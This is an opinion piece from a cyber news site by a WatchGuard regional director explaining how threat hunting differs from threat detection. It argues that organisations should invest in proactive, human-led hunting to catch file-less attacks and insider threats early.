Powered by MOMENTUM MEDIA
cyber daily logo

Breaking news and updates daily. Subscribe to our Newsletter

Breaking news and updates daily. Subscribe to our Newsletter X facebook linkedin Instagram Instagram

How threat hunting can boost your IT security

Organisations should pour more resources into their threat detection capability in an effort to thwart cyber criminals before the damage is done, according to Anthony Daniel from WatchGuard Technologies.

user iconAnthony Daniel
Wed, 09 Feb 2022
How threat hunting can boost your IT security
expand image

Having effective IT security measures in place is vital for organisations of all sizes as the threats posed by cyber criminals continue to increase.

However, the challenge of stopping these attacks is growing as a result of the evolving techniques being used. According to research firm Gartner, 75 per cent of all successful attacks involve the use of “file-less” or “malware-less” attacks. This makes them much more difficult – for many traditional security tools – to spot.

Indeed, according to a recent M-Trends research report, the average time taken by organisations to detect IT security breaches has blown out to an average of 175 days. That is a considerable period of time in which an attacker has access to a target IT infrastructure without the knowledge of the security team.

============
============

For these reasons, the importance of undertaking a strategy of constant threat hunting is vital. If the attackers are not using malware that can be readily detected or taking advantage of known software vulnerabilities, threat hunting is essentially the only way they can be found and neutralised.

Threat hunting is all about identifying attacks in their very early stages. These attacks could be mounted by an external party or by insiders such as staff members who have become dissatisfied with the organisation and are keen to cause disruption and loss.

Threat hunting versus threat detection

When developing a comprehensive IT security framework, it’s important to understand the difference between threat detection and threat hunting.

In a threat detection strategy, an IT security team will first deploy a range of tools across an infrastructure designed to spot threats and report back. The team will then triage those alerts and respond to incidents that are deemed to be serious.

A threat hunting strategy is different. Here, the IT security team will formulate a hypothesis of what form an attack might take and then look for evidence of such an attack within their IT infrastructure. If the hypothesis remains unproven, the team formulates another.

If a hypothesis subsequently ends up being proven, the scope is then expanded, and a hunt initiated for threats that are likely to already exist within the infrastructure. Responses are initiated and new detection mechanisms deployed so that the threats can be more readily spotted in the future.

It should be remembered that threat hunting is not about waiting for a security alert to be triggered but is a far more proactive approach. At the same time, it is not a replacement for threat detection but rather a strategy that is complimentary to it. It is also not a strategy that can be fully automated and so will always require a level of human involvement.

The key benefit of threat hunting

It’s been a long-held view among security teams that keeping IT infrastructures fully secure is a tough task. Attackers only need to find one hole in defences to gain entry and carry out their intended plans.

Threat hunting, however, changes these rules. An attacker needs to hide all traces of having gained entry while the security team only needs to find one trace to detect the intrusion and undertake steps to neutralise it.

To take advantage of a threat hunting strategy, organisations will need to have in place IT security professionals with considerable expertise and industry experience. These team members will need to be very familiar with their organisation’s IT infrastructure and the conventional activity that takes place on it. Armed with this knowledge, they will be in a much better position to spot new threats and take the steps required to prevent them causing disruption.

Alternatively, an organisation can work with an external security vendor that can provide access to the required levels of expertise. The vendor will be able to assist in the development and testing of threat hypotheses to determine what events may have taken place.

A threat hunting strategy can significantly improve the overall security posture of an organisation. Spotting cyber criminals before they can carry out their intended attack can prevent disruption and help to avoid significant financial and reputational losses.

Anthony Daniel is the regional director, Australia, New Zealand and Pacific Islands, at WatchGuard Technologies.

newsletter
cyber daily subscribe
Be the first to hear the latest developments in the cyber industry.